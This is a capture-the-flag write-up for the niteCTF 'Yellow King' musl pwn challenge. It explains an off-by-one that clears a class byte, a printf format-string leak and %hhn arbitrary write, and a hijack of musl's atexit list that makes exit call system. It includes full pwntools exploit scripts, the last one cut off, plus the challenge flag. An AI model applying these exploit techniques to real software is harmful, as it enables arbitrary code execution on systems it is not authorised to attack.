Pwn / Medium

Beating Yellow King With Musl In Ng

CTF writeup for Beating Yellow King With Musl In Ng from niteCTF

//Beating Yellow King With Musl In Ng

This writeup covers the full solve path from zero → local exploit → remote exploit.

  • Target: chall (ELF64)
  • Libc: bundled libc.so (musl, and the binary uses it as the interpreter)
  • Remote: ncat --ssl yellow.chals.nitectf25.live 1337

The core idea is:

  1. Use a logic bug to force a “class” byte to 0.
  2. Reach a format string sink: printf(user_input).
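  3. Because the call site passes no variadic arguments, printf pulls its “arguments” from stale registers and then from the caller’s stack, which includes our buffer. That lets us smuggle a pointer in as an argument (glibc-style positional specifiers do not behave as expected on musl here).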
  4. Use %hhn for byte-wise arbitrary write.
  5. Hijack musl’s atexit handler list so program exit calls system("/bin/sh") (local), or system("cat flag*") (remote, non-interactive).

>1) Local Recon

1.1 The binary runs with the provided musl

The handout includes:

  • chall
  • libc.so

The important detail: chall is built to run with the provided musl (its ELF interpreter points to ./libc.so).

This matters because:

  • glibc assumptions (especially printf internals like positional arguments) often break on musl.
  • exploitation becomes “musl-specific”, not glibc-specific.

1.2 Protections and constraints

From basic inspection:

  • Non-PIE binary (fixed .text, fixed .bss).
  • NX enabled.
  • Stack canary enabled.
  • FULL RELRO (no GOT overwrites).
  • ASLR enabled (libc base changes each run).

So we need a reliable leak + a write primitive.


>2) Bugs

2.1 “Class clobber” logic bug (heap off-by-one style)

The program allocates a 0x21-byte chunk for each character:

  • bytes [0..0x1f]: name buffer (32 bytes)
  • byte [0x20]: class (1 byte)

The code reads the name with read(0, buf, 0x20), then writes a NUL terminator at buf[n].

If we provide exactly 32 bytes, then n == 0x20 and the NUL terminator is written to buf[0x20], which is the class byte.

So by sending a 32-byte name, we set:

  • class = 0

This unlocks the vulnerable message path.
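
The off-by-one can be modelled in a few lines of Python. This is only a simulation of the chunk layout described above, not the challenge's code; `create_character` and the constant names are hypothetical.

```python
NAME_LEN = 0x20    # bytes [0..0x1f]: name buffer
CLASS_OFF = 0x20   # byte  [0x20]:    class

def create_character(cls: int, name: bytes) -> bytearray:
    """Model the 0x21-byte chunk after the class is set and the name is read."""
    chunk = bytearray(NAME_LEN + 1)
    chunk[CLASS_OFF] = cls
    data = name[:NAME_LEN]        # read(0, buf, 0x20) returns at most 0x20 bytes
    chunk[:len(data)] = data
    chunk[len(data)] = 0          # buf[n] = 0; with n == 0x20 this hits the class byte
    return chunk

print(create_character(1, b"A" * 31)[CLASS_OFF])  # class survives
print(create_character(1, b"A" * 32)[CLASS_OFF])  # class clobbered to 0
```

A 31-byte name leaves the class untouched, which is why the name has to be exactly 32 bytes.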

2.2 Format string: printf(buf)

Once class is 0, an action menu leads to:

  • read up to 0x30 bytes into a stack buffer
  • call printf(buffer), with the buffer itself as the format string

Constraints:

  • Input size: 0x30 bytes
  • It enforces at most 13 % characters
  • The program mixes scanf() and read() → you must keep I/O synchronized (interactive-style send/recv).
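
A small guard that rejects a payload before it is sent saves a lot of desynchronized sessions. The sketch below mirrors the two limits listed above; `check_message` is a hypothetical helper, and it assumes the program counts `%` over the whole buffer, as the solve scripts do.

```python
MAX_READ = 0x30      # action() reads at most 0x30 bytes
MAX_PERCENT = 13     # more than 13 '%' characters are rejected

def check_message(payload: bytes) -> bytes:
    """Return payload unchanged if it fits both limits, else raise ValueError."""
    if len(payload) > MAX_READ:
        raise ValueError(f"payload is {len(payload)} bytes, limit is {MAX_READ}")
    percents = payload.count(b"%")
    if percents > MAX_PERCENT:
        raise ValueError(f"payload has {percents} '%' characters, limit is {MAX_PERCENT}")
    return payload

check_message(b"%p" * 13)   # accepted: 26 bytes, 13 '%'
```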

>3) Musl-specific printf behavior (the key insight)

With glibc you might reach for positional specifiers like %7$p, %10$hhn, etc.

Here, positional specifiers are unreliable / don’t behave as expected. Instead, we abuse how musl fetches varargs when the call-site provides none.

At the call-site for printf(buf), only the format pointer is provided. That means:

  • rsi, rdx, rcx, r8, r9 are effectively “whatever the function had” (in this challenge they end up 0)
  • when musl keeps reading more variadic “args”, it starts pulling from the stack

Empirically, for this challenge:

  • arg1..arg6 are 0
  • arg7 looks like a libc pointer
  • arg8..arg13 come directly from our 0x30-byte stack buffer, interpreted as QWORDs

That means the six QWORDs of the message buffer map onto the varargs like this:

buf[0x00..0x07] -> arg8
buf[0x08..0x0f] -> arg9
buf[0x10..0x17] -> arg10
buf[0x18..0x1f] -> arg11
buf[0x20..0x27] -> arg12
buf[0x28..0x2f] -> arg13

So we can place a pointer at buf+0x28 (arg13) and force %s / %hhn to use it by first consuming the twelve preceding args.

This is the entire exploit.
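
The mapping can be expressed as a tiny helper that builds the 0x30-byte buffer. This is a sketch under the layout observed above (arg8 starts at buf+0); `arg_offset`, `place_pointer` and the example address are hypothetical, and `struct` is used instead of pwntools so the snippet runs on its own.

```python
import struct

FIRST_BUF_ARG = 8    # arg8 is the first QWORD of the message buffer
BUF_SIZE = 0x30

def arg_offset(arg_index: int) -> int:
    """Buffer offset of the QWORD that printf sees as argument arg_index."""
    off = 8 * (arg_index - FIRST_BUF_ARG)
    if not 0 <= off <= BUF_SIZE - 8:
        raise ValueError("argument does not live in the message buffer")
    return off

def place_pointer(fmt: bytes, ptr: int, arg_index: int = 13) -> bytes:
    """Format string, NUL, filler, then ptr at the slot for arg_index."""
    off = arg_offset(arg_index)
    if b"\x00" in fmt or len(fmt) >= off:
        raise ValueError("format string must be NUL-free and end before the pointer")
    return (fmt + b"\x00").ljust(off, b"X") + struct.pack("<Q", ptr)

payload = place_pointer(b"%p" * 12 + b"|%s", 0x404018)  # 0x404018: made-up address
print(len(payload), payload[40:].hex())
```

The NUL after the format string is what allows the pointer bytes (which contain zeros) to sit in the same buffer without being parsed as format text.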


>4) Building primitives

4.1 Confirm vararg smuggling

I used small scripts to understand the vararg stream and the buffer mapping.

  • scan_args.py prints 13 %p to see what args look like.
  • fmt_fuzz.py brute-forces where a tail QWORD shows up.

Once we know arg8+ is our buffer, we stop relying on “tail after NUL” alignment hacks and just place the pointer at a fixed offset.

4.2 Memory leak: read printf@got using %s

Because the binary is FULL RELRO, the GOT is read-only but still perfect for leaking resolved addresses.

Plan:

  1. Put printf@got into arg13.
  2. Print 12 “dummy” args with %p to consume up to arg12.
  3. Use %s which now dereferences arg13.

Format string used:

  • '%p'*12 + '|' + '%s'

Then parse bytes after |.

This gives printf’s runtime address and therefore:

  • libc_base = printf_addr - libc.symbols['printf']
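
Parsing the leak is just little-endian unpacking of whatever follows the separator. The sketch below assumes the leaked pointer has at most 6 significant bytes (typical for x86-64 user space) so that any program output after it is not mistaken for address bytes; the offset and output bytes in the demo are made up, and the real `printf` offset comes from the provided libc.so.

```python
import struct

def parse_leak(output: bytes) -> int:
    """Extract the little-endian pointer that %s printed after the '|' separator."""
    if b"|" not in output:
        raise ValueError("separator not found; the leak probably failed")
    raw = output.split(b"|", 1)[1][:6]    # assumption: at most 6 significant bytes
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]

def libc_base_from(printf_addr: int, printf_offset: int) -> int:
    """Subtract the symbol offset and sanity-check page alignment."""
    base = printf_addr - printf_offset
    if base & 0xFFF:
        raise ValueError(f"libc base {base:#x} is not page-aligned; bad leak?")
    return base

demo_output = b"0x1|" + bytes.fromhex("a0f25e34127f") + b"\n"   # hypothetical output
printf_addr = parse_leak(demo_output)
print(hex(libc_base_from(printf_addr, 0x4f2a0)))                # 0x4f2a0: made-up offset
```

The alignment check is cheap and catches the common failure where the leaked address contains a NUL byte and %s stops early.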

4.3 Arbitrary write (byte-wise): %hhn

We want a clean, predictable character count.

Trick:

  • use eleven %c → prints exactly 11 characters and consumes args1..11
  • use %<pad>c → prints pad characters (consumes arg12)
  • use %hhn → writes low byte of the printed count into *(arg13)

Printed count becomes 11 + pad.

So to write byte b:

  • pad = (b - 11) % 256 (if pad = 0, use 256, since a width of 0 would still print one character)

Now we have a reliable write_hhn(where, byte) primitive.
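
The pad arithmetic is easy to get wrong by one, so it is worth checking for all 256 byte values. The sketch below only builds the format string and does not talk to the target; `write_pad` and `hhn_format` are hypothetical names.

```python
def write_pad(byte_val: int) -> int:
    """Width for the twelfth %c so that 11 + width has low byte byte_val."""
    if not 0 <= byte_val <= 0xFF:
        raise ValueError("byte_val must fit in one byte")
    pad = (byte_val - 11) % 256
    return pad if pad != 0 else 256

def hhn_format(byte_val: int) -> bytes:
    """Eleven %c, one padded %c, then %hhn: 13 '%' characters in total."""
    return b"%c" * 11 + f"%{write_pad(byte_val)}c%hhn".encode()

# Every byte value is reachable, and the format always fits before buf+0x28.
assert all((11 + write_pad(b)) % 256 == b for b in range(256))
assert all(len(hhn_format(b)) < 40 for b in range(256))
print(hhn_format(0x41))
```

The format uses exactly 13 `%` characters, so it sits right at the program's limit with no room for a second write per message.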


>5) Endgame: hijack musl atexit

Classic format-string endgames are often:

  • overwrite GOT
  • overwrite return address
  • stack pivot + ROP

But here:

  • GOT is read-only
  • stack is protected by canary
  • message buffer is tiny

Instead, we exploit musl’s atexit mechanism.

musl stores a global head pointer to an exit-handler list plus a slot counter.

During normal execution the program registers an exit handler; when the program exits, musl executes:

  • __funcs_on_exit()

That walks the list and does:

  • load func[i] from head + 0x8 + i*8
  • load arg[i] from head + 0x108 + i*8
  • call func[i](arg[i])

So if we can do two things:

  1. Build a fake “atexit node” in the binary’s .bss (fixed address because non-PIE)
  2. Overwrite musl’s globals: head to point at the fake node, slot to 1

Then on exit, musl will call:

  • system(arg0)
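
To see why one fake node with slot = 1 is enough, the walk can be simulated over a toy memory model. This is a sketch of the behaviour described above, not musl's source: the count-down loop order and COUNT = 32 (inferred from 0x108 - 0x8 = 32 * 8) are assumptions, and SYSTEM / CMD are placeholder values.

```python
FUNC_OFF = 0x8     # func[i] lives at head + 0x8 + i*8
ARG_OFF = 0x108    # arg[i]  lives at head + 0x108 + i*8
COUNT = 32         # assumed slots per node

def funcs_on_exit(mem: dict, head: int, slot: int) -> list:
    """Return the (func, arg) pairs that would be called, in order."""
    calls = []
    while head:
        while slot > 0:
            slot -= 1
            func = mem.get(head + FUNC_OFF + 8 * slot, 0)
            arg = mem.get(head + ARG_OFF + 8 * slot, 0)
            calls.append((func, arg))
        head = mem.get(head, 0)   # follow next; NULL ends the walk
        slot = COUNT
    return calls

FAKE, SYSTEM, CMD = 0x404200, 0x7F0000050000, 0x404380   # placeholder values
mem = {FAKE: 0, FAKE + FUNC_OFF: SYSTEM, FAKE + ARG_OFF: CMD}
print([(hex(f), hex(a)) for f, a in funcs_on_exit(mem, FAKE, 1)])
```

With next = NULL and slot = 1, the model makes exactly one call, func[0](arg[0]), and then stops.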

5.1 Offsets used

These offsets came from disassembling musl’s __cxa_atexit / __funcs_on_exit in the provided libc.so.

  • head at libc_base + 0x0c0d88
  • slot at libc_base + 0x0c0fa4

We place our fake node at a fixed .bss address:

  • fake = 0x404200

Fake node layout we write:

  • (fake + 0x0) = 0 (next = NULL)
  • (fake + 0x8) = system
  • (fake + 0x108) = ptr_to_command_string
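
Since every write is one byte per printf call, it helps to list the writes up front. The sketch below expands the layout above plus the head/slot redirect into (address, byte) pairs; `write_plan` is a hypothetical helper, and the libc base, `system` offset and command pointer in the demo are placeholders.

```python
import struct

def qword_writes(addr: int, value: int) -> list:
    """Eight little-endian (address, byte) pairs for one 64-bit value."""
    return [(addr + i, b) for i, b in enumerate(struct.pack("<Q", value))]

def write_plan(fake, system_addr, cmd_ptr, head_addr, slot_addr) -> list:
    plan = []
    plan += qword_writes(fake + 0x0, 0)              # next = NULL
    plan += qword_writes(fake + 0x8, system_addr)    # func[0]
    plan += qword_writes(fake + 0x108, cmd_ptr)      # arg[0]
    plan += qword_writes(head_addr, fake)            # redirect head last
    plan += [(slot_addr + i, b) for i, b in enumerate(struct.pack("<I", 1))]  # slot = 1
    return plan

libc_base = 0x7F12345A0000                           # placeholder base
plan = write_plan(0x404200, libc_base + 0x50000,     # 0x50000: made-up system offset
                  0x404380, libc_base + 0xC0D88, libc_base + 0xC0FA4)
print(len(plan), "one-byte writes")
```

Building the node first and touching head and slot last keeps musl's real list intact until the fake one is complete.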

5.2 Local vs remote

  • Local: arg0 = "/bin/sh" → interactive shell.

  • Remote: we want non-interactive output. So we set:

    arg0 = "cat flag* 2>/dev/null; cat /flag 2>/dev/null"

Then we trigger menu option 3 (exit), and musl runs our handler.
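
For the remote variant the command string has to live somewhere writable, and the solver puts it at fake + 0x180, inside the fake node's own (unused) argument array. The quick check below confirms it does not clobber the three fields slot 0 relies on; `overlaps` is a hypothetical helper.

```python
FAKE = 0x404200
CMD_ADDR = FAKE + 0x180
CMD = b"cat flag* 2>/dev/null; cat /flag 2>/dev/null\n\x00"

# Fields of the fake node that slot 0 actually uses: (start, size).
USED_FIELDS = [(FAKE + 0x0, 8), (FAKE + 0x8, 8), (FAKE + 0x108, 8)]

def overlaps(a_start: int, a_len: int, b_start: int, b_len: int) -> bool:
    """True if the two byte ranges share at least one address."""
    return a_start < b_start + b_len and b_start < a_start + a_len

clobbered = [hex(s) for s, n in USED_FIELDS if overlaps(CMD_ADDR, len(CMD), s, n)]
print(clobbered)   # an empty list means the string is safe where it is
```

Each byte of the command costs one printf round trip, so a shorter command directly shortens the remote exploit.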


>6) How to run

Local

python3 solve_local.py

It drops you into a shell.

Remote (non-interactive)

python3 solve_remote.py

Optional overrides:

  • HOST=yellow.chals.nitectf25.live PORT=1337 python3 solve_remote.py
  • LOG=error python3 solve_remote.py (quiet)

>7) Flag (remote)

The remote run prints:

nite{b34TinG_yeLl0wk1ng_1n_ng+_w1thNo$$s}

//Solver / helper code

Everything below is the exact code used during the solve.

>A.1 explore.py

python
#!/usr/bin/env python3
from pwn import *

context.binary = ELF("./chall", checksec=False)
context.log_level = "info"

def make_char(io, idx: int, cls: int, name: bytes):
    io.recvuntil(b">>")
    io.sendline(b"1")
    io.recvuntil(b"enter index:")
    io.sendline(str(idx).encode())
    io.recvuntil(b">>")  # class prompt ends with >>
    io.sendline(str(cls).encode())
    io.recvuntil(b">>")  # name prompt ends with >>
    if len(name) != 32:
        raise ValueError("name must be exactly 32 bytes to clobber class")
    # TTY/pty input is often line-buffered; include a newline so read() completes.
    # read(0, buf, 0x20) will take the 32 bytes and leave the newline for later.
    io.send(name + b"\n")

def defeat_and_message(io, idx: int, msg: bytes) -> bytes:
    io.recvuntil(b">>")
    io.sendline(b"2")
    io.recvuntil(b"enter index:")
    io.sendline(str(idx).encode())
    io.recvuntil(b"leave..")
    # program uses read(0, buf, 0x30) and then printf(buf); use a marker to delimit output
    if b"%" in msg and msg.count(b"%") > 13:
        raise ValueError("too many %; must be <= 13")
    marker = b"|END"
    if marker in msg:
        raise ValueError("msg already contains marker")
    if b"\x00" in msg:
        raise ValueError("msg must not contain NUL bytes")
    wire = msg + marker + b"\x00"
    # Include a newline to satisfy canonical-mode reads on a pty.
    if len(wire) > 0x2F:
        raise ValueError("message too long (need room for newline in 0x30 read)")
    io.send(wire + b"\n")
    io.recvuntil(b"The message left for other adventurers..")
    io.recvline()  # consume puts() newline
    out = io.recvuntil(marker, timeout=1)
    return out or b""

def main():
    io = process(["./chall"])

    # Create a character and clobber its class byte to 0 by giving a 32-byte name.
    make_char(io, idx=0, cls=1, name=b"A" * 32)

    # Leak stack values in small chunks (message buffer is only 0x30 bytes).
    chunk = 6
    for base in range(1, 121, chunk):
        parts = [f"%{i}$p".encode() for i in range(base, base + chunk)]
        msg = b".".join(parts)
        leak = defeat_and_message(io, idx=0, msg=msg)
        print(f"[{base:03d}-{base+chunk-1:03d}] {leak.decode('latin-1','replace').strip()}")

    io.close()

if __name__ == "__main__":
    main()

>A.2 find_offset.py

python
#!/usr/bin/env python3
from pwn import *

context.binary = ELF('./chall', checksec=False)
context.log_level = 'error'

MARK1 = 0xdeadbeefcafebabe
MARK2 = 0x1122334455667788

def setup(io):
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'enter index:')
  io.sendline(b'0')
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'>>')
  io.send(b'A' * 32 + b'\n')

def send_msg(io, fmt: bytes, tail: bytes) -> bytes:
  io.recvuntil(b'>>')
  io.sendline(b'2')
  io.recvuntil(b'enter index:')
  io.sendline(b'0')
  io.recvuntil(b'leave..')

  wire = fmt + b'\x00' + tail
  if wire.count(b'%') > 13:
    raise ValueError('too many %')
  if len(wire) > 0x2F:
    raise ValueError('too long')
  io.send(wire + b'\n')

  io.recvuntil(b'The message left for other adventurers..\n')
  out = io.recvuntil(b'---MUD---', drop=True, timeout=1)
  return out

def main():
  io = process(['./chall'])
  setup(io)

  tail = p64(MARK1) + p64(MARK2)

  for n in range(1, 14):
    fmt = b'.'.join([b'%p'] * n)
    out = send_msg(io, fmt, tail)
    s = out.decode('latin-1', 'replace').strip('\n')
    hit1 = ('deadbeefcafebabe' in s)
    hit2 = ('1122334455667788' in s)
    print(f'n={n:2d} out={s!r} hit1={hit1} hit2={hit2}')

  io.close()

if __name__ == '__main__':
  main()

>A.3 fmt_fuzz.py

python
#!/usr/bin/env python3
from pwn import *

context.binary = ELF('./chall', checksec=False)
context.log_level = 'error'

MARK = 0xdeadbeefcafebabe

def setup(io):
  io.recvuntil(b'>>'); io.sendline(b'1')
  io.recvuntil(b'enter index:'); io.sendline(b'0')
  io.recvuntil(b'>>'); io.sendline(b'1')
  io.recvuntil(b'>>'); io.send(b'A'*32 + b'\n')

def send_msg(io, msg: bytes) -> bytes:
  io.recvuntil(b'>>'); io.sendline(b'2')
  io.recvuntil(b'enter index:'); io.sendline(b'0')
  io.recvuntil(b'leave..')
  io.send(msg + b'\n')
  io.recvuntil(b'The message left for other adventurers..\n')
  out = io.recvuntil(b'---MUD---', drop=True, timeout=1)
  return out

def main():
  io = process(['./chall'])
  setup(io)

  # We want printf() to eventually treat our tail QWORD as the next vararg.
  # We brute-force small paddings and number of consumed args.
  for pad_len in range(0, 9):
    pad = b'A' * pad_len
    for n in range(1, 14):
      # Keep <=13 '%' total.
      fmt = (b'%p' * n) + b'|'  # '|' separator so output is parseable
      # Place tail after NUL so we can include zeros.
      # Total <= 0x2f bytes (leave room for newline) because action reads 0x30.
      tail = p64(MARK)
      wire = pad + fmt + b'\x00' + tail
      if wire.count(b'%') > 13:
        continue
      if len(wire) > 0x2f:
        continue
      out = send_msg(io, wire)
      if b'deadbeefcafebabe' in out:
        print(f'HIT pad={pad_len} n={n} out={out!r}')
        io.close()
        return
  print('No hit found within search bounds')
  io.close()

if __name__ == '__main__':
  main()

>A.4 scan_args.py

python
#!/usr/bin/env python3
from pwn import *
import re

context.binary = ELF('./chall', checksec=False)
context.log_level = 'error'

def setup(io):
  io.recvuntil(b'>>'); io.sendline(b'1')
  io.recvuntil(b'enter index:'); io.sendline(b'0')
  io.recvuntil(b'>>'); io.sendline(b'1')
  io.recvuntil(b'>>'); io.send(b'A'*32 + b'\n')

def do_msg(io, fmt: bytes, tail: bytes=b'') -> bytes:
  io.recvuntil(b'>>'); io.sendline(b'2')
  io.recvuntil(b'enter index:'); io.sendline(b'0')
  io.recvuntil(b'leave..')
  wire = fmt + b'\x00' + tail
  if wire.count(b'%') > 13:
    raise ValueError('too many %')
  if len(wire) > 0x2f:
    raise ValueError('too long')
  io.send(wire + b'\n')
  io.recvuntil(b'The message left for other adventurers..\n')
  out = io.recvuntil(b'---MUD---', drop=True, timeout=1)
  return out

def main():
  io = process(['./chall'])
  setup(io)

  fmt = b'|'.join([b'%p'] * 13) + b'|END'
  out = do_msg(io, fmt)
  s = out.decode('latin-1', 'replace')
  print(s)

  vals = re.findall(r'0x[0-9a-fA-F]+', s)
  print('hexes:', vals)
  stackish = [v for v in vals if v.lower().startswith('0x7ff')]
  print('stackish:', stackish)

  io.close()

if __name__ == '__main__':
  main()

>A.5 exploit_local.py (experimental)

python
#!/usr/bin/env python3
from pwn import *

BIN_PATH = './chall'
LIBC_PATH = './libc.so'

context.binary = ELF(BIN_PATH, checksec=False)
context.log_level = 'info'

elf = context.binary
libc = ELF(LIBC_PATH, checksec=False)

# These were derived empirically:
# - With our message buffer in action(), the first controlled QWORD placed AFTER the NUL terminator
#   can be consumed as a variadic argument, but alignment depends on where it lands in the 0x30 buffer.
# - In practice the variadic arguments come from:
#     arg1..arg5: rsi, rdx, rcx, r8, r9 (all 0 at the call-site)
#     arg6..arg7: stack at rsp, rsp+8
#     arg8..     : our 0x30-byte message buffer at rdi (rsp+0x10)
#   Specifically:
#     arg8  = buf[0:8]
#     arg9  = buf[8:16]
#     arg10 = buf[16:24]
#     arg11 = buf[24:32]
#     arg12 = buf[32:40]
#     arg13 = buf[40:48]
# - Using four "%*c" (consuming 8 args) plus two "%c" (consuming 2 args) consumes 10 args
#   using only 6 '%' characters, leaving room for multiple %n writes.
CONSUME_10 = b'%*c%*c%*c%*c%c%c'

def build_msg(fmt: bytes, qwords_at: dict[int, int]) -> bytes:
  """Build the exact 0x30-byte message buffer for action()'s read().

  We force the NUL terminator inside the first 24 bytes so arg11+ can contain arbitrary
  QWORDs (including NUL bytes) without affecting the format string.
  """
  buf = bytearray(b'B' * 0x30)
  if b'\x00' in fmt:
    raise ValueError('format string must not contain NUL')
  if len(fmt) >= 24:
    raise ValueError('format string must be < 24 bytes to keep arg11 area free')
  buf[:len(fmt)] = fmt
  buf[len(fmt)] = 0

  for off, val in qwords_at.items():
    if off % 8 != 0:
      raise ValueError('qword offsets must be 8-byte aligned')
    if off < 0 or off + 8 > 0x30:
      raise ValueError('qword offset out of range')
    buf[off:off+8] = p64(val)
  return bytes(buf)

def make_char_zero_class(io, idx: int = 0):
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'enter index:')
  io.sendline(str(idx).encode())
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'>>')
  io.send(b'A' * 32 + b'\n')

def send_message(io, idx: int, payload: bytes) -> bytes:
  io.recvuntil(b'>>')
  io.sendline(b'2')
  io.recvuntil(b'enter index:')
  io.sendline(str(idx).encode())
  io.recvuntil(b'leave..')

  if payload.count(b'%') > 13:
    raise ValueError('too many %')
  if len(payload) != 0x30:
    raise ValueError('payload must be exactly 0x30 bytes (action reads 0x30)')

  io.send(payload + b'\n')
  io.recvuntil(b'The message left for other adventurers..\n')
  out = io.recvuntil(b'---MUD---', drop=True, timeout=1)
  return out

def leak_bytes(io, ptr: int, nbytes: int = 8) -> bytes:
  """Leak up to nbytes from memory at ptr using %.*s.

  Note: This is string-based and will stop early at NUL.
  We wrap output between markers for parsing.

  Arg layout:
    - consume 10 args
    - %.*s uses arg11 (precision int), arg12 (char*)
  """
  marker1 = b'<'
  marker2 = b'>'

  # consume 10 args, then %.*s consumes:
  #   arg11: precision (int)
  #   arg12: pointer
  fmt = CONSUME_10 + marker1 + b'%.*s' + marker2
  payload = build_msg(
    fmt,
    {
      24: nbytes,
      32: ptr,
    },
  )

  out = send_message(io, 0, payload)
  try:
    start = out.rindex(marker1) + 1
    end = out.rindex(marker2)
  except ValueError:
    raise RuntimeError(f'Failed to parse leak markers in output: {out!r}')
  return out[start:end]

def u64_leak(partial: bytes) -> int:
  data = partial.ljust(8, b'\x00')
  return u64(data)

def main():
  io = process([BIN_PATH])
  make_char_zero_class(io, idx=0)

  printf_got = elf.got['printf']
  log.info(f'printf@got = {hex(printf_got)}')

  printf_leak = leak_bytes(io, printf_got, 8)
  log.info(f'printf@got raw bytes: {printf_leak!r}')
  printf_addr = u64_leak(printf_leak)
  log.info(f'printf runtime addr = {hex(printf_addr)}')

  libc_base = printf_addr - libc.symbols['printf']
  log.info(f'libc base = {hex(libc_base)}')

  environ_addr = libc_base + libc.symbols['environ']
  envp_ptr_bytes = leak_bytes(io, environ_addr, 8)
  envp_ptr = u64_leak(envp_ptr_bytes)
  log.info(f'environ (char**) = {hex(envp_ptr)} (bytes={envp_ptr_bytes!r})')

  # Try to locate our action() stack buffer by scanning downward from envp_ptr.
  # We look for the literal substring of our format-string prefix.
  found = None
  needle = CONSUME_10[:8]
  for step in [0x1000, 0x100, 0x20, 0x8]:
    if found is None:
      start = envp_ptr
    else:
      start = found
    # scan within 0x400000 each pass
    for off in range(0, 0x400000, step):
      addr = start - off
      try:
        s = leak_bytes(io, addr, 0x60)
      except Exception:
        continue
      if needle in s:
        found = addr
        log.info(f'Found stack marker near {hex(found)} (step={hex(step)})')
        break

  if found is None:
    log.warning('Did not find MAGIC marker by stack scan.')
  else:
    log.info(f'Candidate stack buffer addr ~ {hex(found)}')

  io.close()

if __name__ == '__main__':
  main()

>A.6 solve_local.py (final local exploit)

python
#!/usr/bin/env python3
from pwn import *

BIN = './chall'
LIBC = './libc.so'

context.binary = ELF(BIN, checksec=False)
elf = context.binary
libc = ELF(LIBC, checksec=False)

context.log_level = 'info'

# musl printf varargs observed in this challenge:
# - arg1..arg6 are 0
# - arg7 is a libc-ish pointer
# - arg8+ are sourced from the action() stack buffer (48 bytes) starting at buffer+0
#   i.e. arg8->buf+0, arg9->buf+8, ..., arg13->buf+40.
# We place our controlled pointer at arg13 to give enough format-string room for
# width digits while still staying under the 0x30-byte read.
ARG_INDEX = 13
PTR_OFF = 8 * (ARG_INDEX - 8)  # 40
MAX_READ = 0x30

# --- interaction helpers ---

def make_char_zero_class(io, idx=0):
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'enter index:')
  io.sendline(str(idx).encode())
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'>>')
  io.send(b'A'*32 + b'\n')

def send_message(io, idx: int, payload: bytes) -> bytes:
  io.recvuntil(b'>>')
  io.sendline(b'2')
  io.recvuntil(b'enter index:')
  io.sendline(str(idx).encode())
  io.recvuntil(b'leave..')

  if payload.count(b'%') > 13:
    raise ValueError('too many %')
  # action() reads 0x30 bytes.
  # We append a newline after the payload; read() will consume up to 0x30 bytes and
  # leave the newline for the next prompt.
  if len(payload) > 0x30:
    raise ValueError('payload too long')

  io.send(payload + b'\n')
  io.recvuntil(b'The message left for other adventurers..\n')
  out = io.recvuntil(b'---MUD---', drop=True, timeout=1)
  return out

def craft_with_ptr(fmt: bytes, ptr: int) -> bytes:
  """Craft a payload where ptr is placed at arg13 (buf+40).

  Layout in the 0x30 buffer:
    [0..len(fmt)-1] fmt bytes
    [len(fmt)]      NUL terminator
    [.. PTR_OFF-1]  filler 'X'
    [PTR_OFF..]     ptr qword
  """
  if b'\x00' in fmt:
    raise ValueError('fmt must not contain NUL')
  if len(fmt) >= PTR_OFF:
    raise ValueError('fmt too long to place ptr at fixed offset')
  filler_len = PTR_OFF - (len(fmt) + 1)
  payload = fmt + b'\x00' + (b'X' * filler_len) + p64(ptr)
  if len(payload) > MAX_READ:
    raise ValueError('payload exceeds 0x30 read budget')
  return payload

def leak_ptr(io, addr: int, max_bytes: int = 16) -> bytes:
  """Leak bytes at addr using %s with ptr in arg13."""
  # 12 specs to consume args1..12, then %s uses arg13.
  fmt = (b'%p' * 12) + b'|' + b'%s'
  out = send_message(io, 0, craft_with_ptr(fmt, addr))
  if b'|' not in out:
    return b''
  leak = out.split(b'|', 1)[1]
  return leak[:max_bytes]

def write_hhn(io, where: int, byte_val: int):
  """Write one byte to *where using %hhn with ptr in arg13.

  We consume args1..11 with eleven "%c" (each prints exactly 1 char),
  then use "%<pad>c" as arg12 (prints pad chars), then "%hhn" uses arg13.
  Total printed count = 11 + pad.
  """
  assert 0 <= byte_val <= 0xFF
  pad = (byte_val - 11) % 256
  if pad == 0:
    pad = 256
  fmt = (b'%c' * 11) + f'%{pad}c%hhn'.encode()
  send_message(io, 0, craft_with_ptr(fmt, where))

def write_qword(io, where: int, value: int):
  for i in range(8):
    write_hhn(io, where + i, (value >> (8*i)) & 0xFF)

def main():
  io = process([BIN])
  make_char_zero_class(io, 0)

  # Leak printf@got -> libc base
  printf_got = elf.got['printf']
  leak = leak_ptr(io, printf_got, max_bytes=8)
  log.info(f'printf@got leak bytes: {leak!r}')
  printf_addr = u64(leak.ljust(8, b'\x00'))
  libc_base = printf_addr - libc.symbols['printf']
  log.info(f'libc_base = {hex(libc_base)}')

  system_addr = libc_base + libc.symbols['system']
  binsh_addr = libc_base + 0xa4f60  # from strings -t x libc.so

  head_addr = libc_base + 0xc0d88
  slot_addr = libc_base + 0xc0fa4

  fake = 0x404200  # writable .bss in non-PIE binary

  log.info(f'system={hex(system_addr)} /bin/sh={hex(binsh_addr)}')
  log.info(f'head={hex(head_addr)} slot={hex(slot_addr)} fake={hex(fake)}')

  # Build fake atexit block (0x208 bytes expected by musl)
  # Layout used by __funcs_on_exit:
  #   [0x0] next
  #   [0x8 + i*8] func[i]
  #   [0x108 + i*8] arg[i]
  write_qword(io, fake + 0x0, 0)
  write_qword(io, fake + 0x8, system_addr)
  write_qword(io, fake + 0x108, binsh_addr)

  # Point head to our fake block and set slot=1.
  write_qword(io, head_addr, fake)
  # slot is a 32-bit int
  write_hhn(io, slot_addr + 0, 1)
  write_hhn(io, slot_addr + 1, 0)
  write_hhn(io, slot_addr + 2, 0)
  write_hhn(io, slot_addr + 3, 0)

  log.info('Triggering exit to run atexit handlers...')
  io.recvuntil(b'>>')
  io.sendline(b'3')

  io.interactive()

if __name__ == '__main__':
  main()

>A.7 solve_remote.py (final remote exploit, non-interactive)

python
#!/usr/bin/env python3
from pwn import *
import os

BIN = './chall'
LIBC = './libc.so'

context.binary = ELF(BIN, checksec=False)
elf = context.binary
libc = ELF(LIBC, checksec=False)

# Keep output minimal but informative.
context.log_level = os.environ.get('LOG', 'info')

HOST = os.environ.get('HOST', 'yellow.chals.nitectf25.live')
PORT = int(os.environ.get('PORT', '1337'))

# musl printf varargs observed in this challenge:
# - arg1..arg6 are 0
# - arg7 is a libc-ish pointer
# - arg8+ are sourced from the action() stack buffer (48 bytes) starting at buffer+0
